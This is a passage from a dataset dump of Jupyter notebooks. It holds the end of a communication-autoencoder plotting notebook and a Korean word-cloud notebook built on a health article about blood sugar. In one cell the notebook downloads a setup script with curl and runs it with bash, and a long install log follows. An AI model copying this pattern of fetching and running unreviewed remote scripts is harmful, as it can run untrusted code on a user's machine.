np.array([ en for (_,en) in density_data.items() ])\n# if np.max(d) < 1.4*qam_en: # Avoid un-necessary models\n plt.hist(d, bins=100, cumulative=True, density=True, histtype=\"step\", label=model_exp, \n color=next(colors), linewidth=2, linestyle=\":\" if \"Oshea\" in model_exp or \"[1]\" in model_exp else \"-\")\n selected_max_en.append(np.max(d)) if np.max(d) < 1.5*qam_en else None\n print(model_exp, \" Min:\", np.min(d), \" Max:\", np.max(d))\nplt.xlim([0.95*agrell_en,np.max(selected_max_en)*1.05])\nplt.grid()\nplt.legend(loc='upper left', prop={'size':14})\n# plt.title(\"Packing Density for ({},{})\".format(blkSize,chDim), fontdict={'fontsize':18})\nplt.xlabel(\"$E_n$\", fontdict={'fontsize':16})\nplt.ylabel(\"CDF\", fontdict={'fontsize':16})\nplt.savefig(\"output_rbf_en_{:02d}x{:02d}.pdf\".format(blkSize,chDim), format='pdf', bbox_inches='tight')\nplt.savefig(\"output_rbf_en_{:02d}x{:02d}.eps\".format(blkSize,chDim), format='eps', bbox_inches='tight')", "[1] Min: 1.0957113758453254 Max: 1.4242162083206868\nProposed: Trained with (19) Min: 0.9442138580261565 Max: 1.1523691471870963\nProposed: Trained with (23) Min: 1.0544938823083154 Max: 1.2040457387710786\n" ] ], [ [ "Plot constellation for best models", "_____no_output_____" ] ], [ [ "for (model_exp,density_data) in results.items():\n file_prefix = model_summary[model_exp].split(\"_summary.dil\")[0]\n modelid = min(density_data, key=density_data.get)\n config_file = file_prefix + \"_\" + modelid + \".dil\"\n config = {}\n model = None\n with open(config_file, \"rb\") as cfg_file:\n config = dill.load(cfg_file)\n if 'obj_fn' in config: # obj_fn is there only for proposed CommVAE\n model = CommVAE1hot()\n else:\n model = AEOshea1hot()\n model.load_model(file_prefix+\"_\"+modelid)\n # Compute TX Map\n dl_map = model.encode(one_hot_code)\n max_mag = np.max(np.abs(dl_map))\n tick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ]\n # Plot TX Map\n fig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\n for i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n _ax.scatter(dl_map[:,i],dl_map[:,i+chDim],c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (dl_map[j,i],dl_map[j,i+chDim]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\n fig.suptitle(\"{} $E_n={:5.4f}$\".format(model_exp,density_data[modelid]), fontsize=16)\n \n # Clear Session and Model\n K.clear_session()\n del model\n \n# Plot QAM Model\nfig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\nmax_mag = np.max(np.abs(qam_map))\ntick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ] \nfor i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n _ax.scatter(qam_map[:,2*i], qam_map[:,2*i+1], c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (qam_map[j,2*i],qam_map[j,2*i+1]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\nfig.suptitle(\"{} $E_n={:5.4f}$\".format(\"QAM\",qam_en), fontsize=16)\n\n# Plot Agrell Model\nfig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\nmax_mag = np.max(np.abs(agrell_map))\ntick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ] \nfor i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n _ax.scatter(agrell_map[:,2*i], agrell_map[:,2*i+1], c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (agrell_map[j,2*i],agrell_map[j,2*i+1]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\nfig.suptitle(\"{} $E_n={:5.4f}$\".format(\"Agrell\",agrell_en), fontsize=16)", "WARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72e21a36b7d9c26c06ce10242fb387fff4f8fc4
335,474
ipynb
Jupyter Notebook
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
177.124604
208,966
0.785304
[ [ [ "!pip install wordcloud", "Requirement already satisfied: wordcloud in /usr/local/lib/python3.7/dist-packages (1.5.0)\nRequirement already satisfied: numpy>=1.6.1 in /usr/local/lib/python3.7/dist-packages (from wordcloud) (1.19.5)\nRequirement already satisfied: pillow in /usr/local/lib/python3.7/dist-packages (from wordcloud) (7.1.2)\n" ], [ "!python -m pip install konlpy", "Collecting konlpy\n Downloading konlpy-0.5.2-py2.py3-none-any.whl (19.4 MB)\n\u001b[K |████████████████████████████████| 19.4 MB 1.3 MB/s \n\u001b[?25hCollecting colorama\n Downloading colorama-0.4.4-py2.py3-none-any.whl (16 kB)\nRequirement already satisfied: tweepy>=3.7.0 in /usr/local/lib/python3.7/dist-packages (from konlpy) (3.10.0)\nCollecting JPype1>=0.7.0\n Downloading JPype1-1.3.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl (448 kB)\n\u001b[K |████████████████████████████████| 448 kB 47.3 MB/s \n\u001b[?25hRequirement already satisfied: numpy>=1.6 in /usr/local/lib/python3.7/dist-packages (from konlpy) (1.19.5)\nRequirement already satisfied: lxml>=4.1.0 in /usr/local/lib/python3.7/dist-packages (from konlpy) (4.2.6)\nCollecting beautifulsoup4==4.6.0\n Downloading beautifulsoup4-4.6.0-py3-none-any.whl (86 kB)\n\u001b[K |████████████████████████████████| 86 kB 6.1 MB/s \n\u001b[?25hRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from JPype1>=0.7.0->konlpy) (3.7.4.3)\nRequirement already satisfied: requests-oauthlib>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (1.3.0)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (1.15.0)\nRequirement already satisfied: requests[socks]>=2.11.1 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (2.23.0)\nRequirement already satisfied: oauthlib>=3.0.0 in /usr/local/lib/python3.7/dist-packages (from requests-oauthlib>=0.7.0->tweepy>=3.7.0->konlpy) (3.1.1)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (3.0.4)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (2.10)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (2021.5.30)\nRequirement already satisfied: PySocks!=1.5.7,>=1.5.6 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (1.7.1)\nInstalling collected packages: JPype1, colorama, beautifulsoup4, konlpy\n Attempting uninstall: beautifulsoup4\n Found existing installation: beautifulsoup4 4.6.3\n Uninstalling beautifulsoup4-4.6.3:\n Successfully uninstalled beautifulsoup4-4.6.3\nSuccessfully installed JPype1-1.3.0 beautifulsoup4-4.6.0 colorama-0.4.4 konlpy-0.5.2\n" ], [ "from wordcloud import WordCloud\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "article ='''살이 찌고 혈당이 오르는 이유는 간단하다. 많이 먹고 움직이지 않기 때문이다. 심지어 식사 후 바로 누워 자는 사람도 있다. 살을 빼고 혈당을 관리하려면 \"먹었으면 움직여라\"는 말을 새겨들을 필요가 있다. 일상생활에서 혈당을 내리고 다이어트에 좋은 습관에 대해 알아보자.\n\n◆ 음식 먹으면 올라가는 혈당.. 당뇨병 예방-관리에 비상\n\n혈액 속에 포함된 당(포도당)의 농도가 바로 혈당이다. 음식을 먹으면 포도당이 만들어지고 인슐린과 글루카곤, 두 가지 물질에 의해 조절된다. 혈당은 식후에 올라가고 공복 상태가 되면 떨어진다. 많이 먹고 잘 움직이질 않으면 혈당 조절을 하는 인슐린의 분비가 제대로 이뤄지지 않는다. 혈당이 높아지면 당뇨병 위험이 커진다. 당뇨병에 걸리면 완치가 없다. 평생 관리해야 한다. 심장병(협심증, 심근경색)이나 뇌졸중(뇌출혈, 뇌경색) 등 혈관 질환 위험이 높아진다.\n\n◆ 식후 입가심으로 케이크?\n\n식사를 한 뒤 케이크를 먹는 경우가 있다. 하지만 설탕, 꿀, 물엿, 시럽, 초콜릿, 사탕, 탄산음료 등 단순당이 많이 함유된 식품은 혈당을 급격하게 올릴 수 있다. 대한당뇨병학회에 따르면 단순당은 농축된 열량원이기 때문에 소화흡수가 빨라 혈당을 급속히 높일 수 있다. 아침 공복에 운동을 하다 저혈당에 빠진 당뇨병 환자가 급하게 당이 든 음식을 찾는 것도 혈당을 빠르게 올려야 하기 때문이다.\n\n◆ 과일은 식후에 먹는다? \"식전에 드셔 보세요\"\n\n식사 후에 과일을 먹는 것이 일상화되어 있다. 하지만 혈당 관리에는 좋지 않다. 오히려 식사 전에 먹으면 과식을 막고 혈당 조절에도 도움이 된다. 잘 익은 과일, 단 맛이 강한 과일은 당지수가 높다. 평소 혈당이 높은 사람은 열대과일 등 단 과일을 피해야 한다. 건강한 사람이라도 단 과일을 과식하지 않는 게 좋다. 과일도 많이 먹으면 혈당을 올리고 살이 찔 우려가 있다. 사과는 3분의 1쪽, 바나나는 반 개 정도가 좋다. 토마토처럼 당도가 비교적 낮고 수분함량이 높은 채소나 과일은 작은 크기 2개를 먹어도 된다.\n\n◆ 닭 칼국수, 콩국수가 혈당 관리에 좋은 이유\n\n밥, 빵, 떡, 국수 같은 탄수화물은 음식은 당지수가 높아 혈당을 빨리 올린다. 이런 음식들은 혈당을 천천히 올리는 살코기(쇠고기, 돼지고기, 닭고기 등), 생선 같은 단백질과 함께 먹으면 혈당 상승을 느리게 할 수 있다. 닭 가슴살이 든 칼국수나 콩 단백질이 풍부한 콩국수도 도움이 된다. 콩은 포도당이나 콜레스테롤의 흡수를 지연시켜 혈당이 서서히 오르게 한다.\n\n◆ 식초는 맛? \"건강효과 따로 있어요\"\n\n식초는 시큼한 맛 뿐 아니라 혈당 조절에 효과를 낸다. 혈당을 천천히 올리기 때문에 음식물에 넣어 먹으면 건강에 좋다. 짜장면을 먹을 때 단무지에 식초를 뿌리면 혈당 조절에 도움이 될 수 있다. 늘 밥에 곁들이는 나물을 만들 때도 식초를 활용해보자. 탄수화물이 많은 밥이 혈당 상승을 주도하는 것을 줄일 수 있다.\n\n◆ \"식사 후 몸을 꼭 움직이세요\"\n\n운동은 칼로리를 소모시키고 혈당을 직접적으로 떨어뜨린다. 이미 당뇨병이 있다면 혈관 질환 등 합병증을 예방한다. 아침 식사 후 대중교통을 이용하면 걷기, 계단 오르기 등 운동을 할 수 있다. 하지만 점심, 저녁 식사 후가 문제다. 혈당이 가장 높아지는 시간은 식후 30분~1시간 사이다. 따라서 운동의 최적 시기는 식후 30분~1시간 이후라고 할 수 있다. 직장인은 의자에 앉기 보다는 가급적 서서 업무를 보거나 복도를 걷는 것이 좋다.\n\n◆ 식후 바로 눕는 것은 최악.. 걷기가 최선\n\n식사 후 바로 눕는 것은 최악이다. 입속으로 신물이 올라오는 위식도역류질환 위험도 높아진다. 걷기가 가장 좋지만 거실이나 방을 어슬렁거려도 좋다. 30분 정도 몸을 움직이면 혈당을 내리고 소화에도 큰 도움이 된다. 당뇨병에 좋은 운동은 숨이 조금 찰 정도의 강도로 하루에 30∼60분 가량, 일주일에 3~4차례는 해야 한다. 무리한 운동보다는 빠르게 걷기, 자전거 타기 등이 좋다. 무엇보다 중요한 것은 \"먹었으면 움직여라\"는 말을 실천하는 것이다.\n.'''", "_____no_output_____" ], [ "type(article) # 스크래핑한 자료를 받을 때의 타입에 따라 앞부분이 달라질 수 있음", "_____no_output_____" ] ], [ [ "명사와 조사를 분리하고 조사와 필요없는 단어를 stopword에 넣어 제거하는 것이 필요", "_____no_output_____" ] ], [ [ "import konlpy", "_____no_output_____" ], [ "okt = konlpy.tag.Okt()", "_____no_output_____" ], [ "stopwords = ['의','가','이','은','들','는','좀','잘','걍','과','도','를','으로','자','에','와','한','하다']", "_____no_output_____" ], [ "!curl -O https://raw.githubusercontent.com/konlpy/konlpy/master/scripts/mecab.sh", " % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 5064 100 5064 0 0 49165 0 --:--:-- --:--:-- --:--:-- 49165\n" ], [ "!bash ./mecab.sh", "Installing automake (A dependency for mecab-ko)\nGet:1 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]\nGet:2 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran40/ InRelease [3,626 B]\nIgn:3 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 InRelease\nGet:4 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic InRelease [15.9 kB]\nHit:5 http://archive.ubuntu.com/ubuntu bionic InRelease\nIgn:6 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 InRelease\nGet:7 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release [697 B]\nHit:8 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release\nGet:9 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release.gpg [836 B]\nGet:10 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran40/ Packages [62.9 kB]\nGet:11 http://archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB]\nGet:12 http://security.ubuntu.com/ubuntu bionic-security/restricted amd64 Packages [510 kB]\nHit:13 http://ppa.launchpad.net/cran/libgit2/ubuntu bionic InRelease\nGet:14 http://security.ubuntu.com/ubuntu bionic-security/universe amd64 Packages [1,420 kB]\nGet:15 http://security.ubuntu.com/ubuntu bionic-security/multiverse amd64 Packages [26.7 kB]\nGet:16 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages [2,263 kB]\nGet:17 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB]\nGet:18 http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic InRelease [15.9 kB]\nGet:20 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic InRelease [21.3 kB]\nIgn:21 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Packages\nGet:21 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Packages [695 kB]\nGet:22 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic/main Sources [1,786 kB]\nGet:23 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [2,699 kB]\nGet:24 http://archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [39.4 kB]\nGet:25 http://archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [544 kB]\nGet:26 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [2,195 kB]\nGet:27 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic/main amd64 Packages [914 kB]\nGet:28 http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic/main amd64 Packages [40.9 kB]\nGet:29 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic/main amd64 Packages [44.1 kB]\nFetched 13.6 MB in 3s (4,410 kB/s)\nReading package lists... Done\nReading package lists... Done\nBuilding dependency tree \nReading state information... Done\nThe following additional packages will be installed:\n autoconf autotools-dev libsigsegv2 m4\nSuggested packages:\n autoconf-archive gnu-standards autoconf-doc libtool gettext m4-doc\nThe following NEW packages will be installed:\n autoconf automake autotools-dev libsigsegv2 m4\n0 upgraded, 5 newly installed, 0 to remove and 100 not upgraded.\nNeed to get 1,082 kB of archives.\nAfter this operation, 3,994 kB of additional disk space will be used.\nGet:1 http://archive.ubuntu.com/ubuntu bionic/main amd64 libsigsegv2 amd64 2.12-1 [14.7 kB]\nGet:2 http://archive.ubuntu.com/ubuntu bionic/main amd64 m4 amd64 1.4.18-1 [197 kB]\nGet:3 http://archive.ubuntu.com/ubuntu bionic/main amd64 autoconf all 2.69-11 [322 kB]\nGet:4 http://archive.ubuntu.com/ubuntu bionic/main amd64 autotools-dev all 20180224.1 [39.6 kB]\nGet:5 http://archive.ubuntu.com/ubuntu bionic/main amd64 automake all 1:1.15.1-3ubuntu2 [509 kB]\nFetched 1,082 kB in 1s (1,371 kB/s)\ndebconf: unable to initialize frontend: Dialog\ndebconf: (No usable dialog-like program is installed, so the dialog based frontend cannot be used. at /usr/share/perl5/Debconf/FrontEnd/Dialog.pm line 76, <> line 5.)\ndebconf: falling back to frontend: Readline\ndebconf: unable to initialize frontend: Readline\ndebconf: (This frontend requires a controlling tty.)\ndebconf: falling back to frontend: Teletype\ndpkg-preconfigure: unable to re-open stdin: \nSelecting previously unselected package libsigsegv2:amd64.\n(Reading database ... 160837 files and directories currently installed.)\nPreparing to unpack .../libsigsegv2_2.12-1_amd64.deb ...\nUnpacking libsigsegv2:amd64 (2.12-1) ...\nSelecting previously unselected package m4.\nPreparing to unpack .../archives/m4_1.4.18-1_amd64.deb ...\nUnpacking m4 (1.4.18-1) ...\nSelecting previously unselected package autoconf.\nPreparing to unpack .../autoconf_2.69-11_all.deb ...\nUnpacking autoconf (2.69-11) ...\nSelecting previously unselected package autotools-dev.\nPreparing to unpack .../autotools-dev_20180224.1_all.deb ...\nUnpacking autotools-dev (20180224.1) ...\nSelecting previously unselected package automake.\nPreparing to unpack .../automake_1%3a1.15.1-3ubuntu2_all.deb ...\nUnpacking automake (1:1.15.1-3ubuntu2) ...\nSetting up libsigsegv2:amd64 (2.12-1) ...\nSetting up m4 (1.4.18-1) ...\nSetting up autotools-dev (20180224.1) ...\nSetting up autoconf (2.69-11) ...\nSetting up automake (1:1.15.1-3ubuntu2) ...\nupdate-alternatives: using /usr/bin/automake-1.15 to provide /usr/bin/automake (automake) in auto mode\nProcessing triggers for libc-bin (2.27-3ubuntu1.2) ...\n/sbin/ldconfig.real: /usr/local/lib/python3.7/dist-packages/ideep4py/lib/libmkldnn.so.0 is not a symbolic link\n\nProcessing triggers for man-db (2.8.3-2ubuntu0.1) ...\nInstall mecab-ko-dic\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n100 1381k 100 1381k 0 0 6141k 0 --:--:-- --:--:-- --:--:-- 6141k\nmecab-0.996-ko-0.9.2/\nmecab-0.996-ko-0.9.2/example/\nmecab-0.996-ko-0.9.2/example/example.cpp\nmecab-0.996-ko-0.9.2/example/example_lattice.cpp\nmecab-0.996-ko-0.9.2/example/example_lattice.c\nmecab-0.996-ko-0.9.2/example/example.c\nmecab-0.996-ko-0.9.2/example/thread_test.cpp\nmecab-0.996-ko-0.9.2/mecab-config.in\nmecab-0.996-ko-0.9.2/man/\nmecab-0.996-ko-0.9.2/man/Makefile.am\nmecab-0.996-ko-0.9.2/man/mecab.1\nmecab-0.996-ko-0.9.2/man/Makefile.in\nmecab-0.996-ko-0.9.2/mecab.iss.in\nmecab-0.996-ko-0.9.2/config.guess\nmecab-0.996-ko-0.9.2/README\nmecab-0.996-ko-0.9.2/COPYING\nmecab-0.996-ko-0.9.2/CHANGES.md\nmecab-0.996-ko-0.9.2/README.md\nmecab-0.996-ko-0.9.2/INSTALL\nmecab-0.996-ko-0.9.2/config.sub\nmecab-0.996-ko-0.9.2/configure.in\nmecab-0.996-ko-0.9.2/swig/\nmecab-0.996-ko-0.9.2/swig/Makefile\nmecab-0.996-ko-0.9.2/swig/version.h.in\nmecab-0.996-ko-0.9.2/swig/version.h\nmecab-0.996-ko-0.9.2/swig/MeCab.i\nmecab-0.996-ko-0.9.2/aclocal.m4\nmecab-0.996-ko-0.9.2/LGPL\nmecab-0.996-ko-0.9.2/Makefile.am\nmecab-0.996-ko-0.9.2/configure\nmecab-0.996-ko-0.9.2/tests/\nmecab-0.996-ko-0.9.2/tests/autolink/\nmecab-0.996-ko-0.9.2/tests/autolink/unk.def\nmecab-0.996-ko-0.9.2/tests/autolink/dicrc\nmecab-0.996-ko-0.9.2/tests/autolink/dic.csv\nmecab-0.996-ko-0.9.2/tests/autolink/test\nmecab-0.996-ko-0.9.2/tests/autolink/char.def\nmecab-0.996-ko-0.9.2/tests/autolink/matrix.def\nmecab-0.996-ko-0.9.2/tests/autolink/test.gld\nmecab-0.996-ko-0.9.2/tests/t9/\nmecab-0.996-ko-0.9.2/tests/t9/unk.def\nmecab-0.996-ko-0.9.2/tests/t9/ipadic.pl\nmecab-0.996-ko-0.9.2/tests/t9/dicrc\nmecab-0.996-ko-0.9.2/tests/t9/dic.csv\nmecab-0.996-ko-0.9.2/tests/t9/test\nmecab-0.996-ko-0.9.2/tests/t9/char.def\nmecab-0.996-ko-0.9.2/tests/t9/matrix.def\nmecab-0.996-ko-0.9.2/tests/t9/mkdic.pl\nmecab-0.996-ko-0.9.2/tests/t9/test.gld\nmecab-0.996-ko-0.9.2/tests/cost-train/\nmecab-0.996-ko-0.9.2/tests/cost-train/ipa.train\nmecab-0.996-ko-0.9.2/tests/cost-train/ipa.test\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/rewrite.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/feature.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/unk.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/dicrc\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/dic.csv\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/char.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/matrix.def\nmecab-0.996-ko-0.9.2/tests/run-eval.sh\nmecab-0.996-ko-0.9.2/tests/run-cost-train.sh\nmecab-0.996-ko-0.9.2/tests/Makefile.am\nmecab-0.996-ko-0.9.2/tests/katakana/\nmecab-0.996-ko-0.9.2/tests/katakana/unk.def\nmecab-0.996-ko-0.9.2/tests/katakana/dicrc\nmecab-0.996-ko-0.9.2/tests/katakana/dic.csv\nmecab-0.996-ko-0.9.2/tests/katakana/test\nmecab-0.996-ko-0.9.2/tests/katakana/char.def\nmecab-0.996-ko-0.9.2/tests/katakana/matrix.def\nmecab-0.996-ko-0.9.2/tests/katakana/test.gld\nmecab-0.996-ko-0.9.2/tests/eval/\nmecab-0.996-ko-0.9.2/tests/eval/answer\nmecab-0.996-ko-0.9.2/tests/eval/system\nmecab-0.996-ko-0.9.2/tests/eval/test.gld\nmecab-0.996-ko-0.9.2/tests/shiin/\nmecab-0.996-ko-0.9.2/tests/shiin/unk.def\nmecab-0.996-ko-0.9.2/tests/shiin/dicrc\nmecab-0.996-ko-0.9.2/tests/shiin/dic.csv\nmecab-0.996-ko-0.9.2/tests/shiin/test\nmecab-0.996-ko-0.9.2/tests/shiin/char.def\nmecab-0.996-ko-0.9.2/tests/shiin/matrix.def\nmecab-0.996-ko-0.9.2/tests/shiin/mkdic.pl\nmecab-0.996-ko-0.9.2/tests/shiin/test.gld\nmecab-0.996-ko-0.9.2/tests/latin/\nmecab-0.996-ko-0.9.2/tests/latin/unk.def\nmecab-0.996-ko-0.9.2/tests/latin/dicrc\nmecab-0.996-ko-0.9.2/tests/latin/dic.csv\nmecab-0.996-ko-0.9.2/tests/latin/test\nmecab-0.996-ko-0.9.2/tests/latin/char.def\nmecab-0.996-ko-0.9.2/tests/latin/matrix.def\nmecab-0.996-ko-0.9.2/tests/latin/test.gld\nmecab-0.996-ko-0.9.2/tests/chartype/\nmecab-0.996-ko-0.9.2/tests/chartype/unk.def\nmecab-0.996-ko-0.9.2/tests/chartype/dicrc\nmecab-0.996-ko-0.9.2/tests/chartype/dic.csv\nmecab-0.996-ko-0.9.2/tests/chartype/test\nmecab-0.996-ko-0.9.2/tests/chartype/char.def\nmecab-0.996-ko-0.9.2/tests/chartype/matrix.def\nmecab-0.996-ko-0.9.2/tests/chartype/test.gld\nmecab-0.996-ko-0.9.2/tests/run-dics.sh\nmecab-0.996-ko-0.9.2/tests/ngram/\nmecab-0.996-ko-0.9.2/tests/ngram/unk.def\nmecab-0.996-ko-0.9.2/tests/ngram/dicrc\nmecab-0.996-ko-0.9.2/tests/ngram/dic.csv\nmecab-0.996-ko-0.9.2/tests/ngram/test\nmecab-0.996-ko-0.9.2/tests/ngram/char.def\nmecab-0.996-ko-0.9.2/tests/ngram/matrix.def\nmecab-0.996-ko-0.9.2/tests/ngram/test.gld\nmecab-0.996-ko-0.9.2/tests/Makefile.in\nmecab-0.996-ko-0.9.2/ltmain.sh\nmecab-0.996-ko-0.9.2/config.rpath\nmecab-0.996-ko-0.9.2/config.h.in\nmecab-0.996-ko-0.9.2/mecabrc.in\nmecab-0.996-ko-0.9.2/GPL\nmecab-0.996-ko-0.9.2/Makefile.train\nmecab-0.996-ko-0.9.2/ChangeLog\nmecab-0.996-ko-0.9.2/install-sh\nmecab-0.996-ko-0.9.2/AUTHORS\nmecab-0.996-ko-0.9.2/doc/\nmecab-0.996-ko-0.9.2/doc/bindings.html\nmecab-0.996-ko-0.9.2/doc/posid.html\nmecab-0.996-ko-0.9.2/doc/unk.html\nmecab-0.996-ko-0.9.2/doc/learn.html\nmecab-0.996-ko-0.9.2/doc/format.html\nmecab-0.996-ko-0.9.2/doc/libmecab.html\nmecab-0.996-ko-0.9.2/doc/mecab.css\nmecab-0.996-ko-0.9.2/doc/feature.html\nmecab-0.996-ko-0.9.2/doc/Makefile.am\nmecab-0.996-ko-0.9.2/doc/soft.html\nmecab-0.996-ko-0.9.2/doc/en/\nmecab-0.996-ko-0.9.2/doc/en/bindings.html\nmecab-0.996-ko-0.9.2/doc/dic-detail.html\nmecab-0.996-ko-0.9.2/doc/flow.png\nmecab-0.996-ko-0.9.2/doc/mecab.html\nmecab-0.996-ko-0.9.2/doc/index.html\nmecab-0.996-ko-0.9.2/doc/result.png\nmecab-0.996-ko-0.9.2/doc/doxygen/\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_a.png\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_eval.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Tagger-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions_vars.html\nmecab-0.996-ko-0.9.2/doc/doxygen/doxygen.css\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_r.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Lattice.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Tagger.html\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h_source.html\nmecab-0.996-ko-0.9.2/doc/doxygen/tabs.css\nmecab-0.996-ko-0.9.2/doc/doxygen/nav_f.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_b.png\nmecab-0.996-ko-0.9.2/doc/doxygen/globals.html\nmecab-0.996-ko-0.9.2/doc/doxygen/nav_h.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_h.png\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Model.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/closed.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_l.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__path__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_type.html\nmecab-0.996-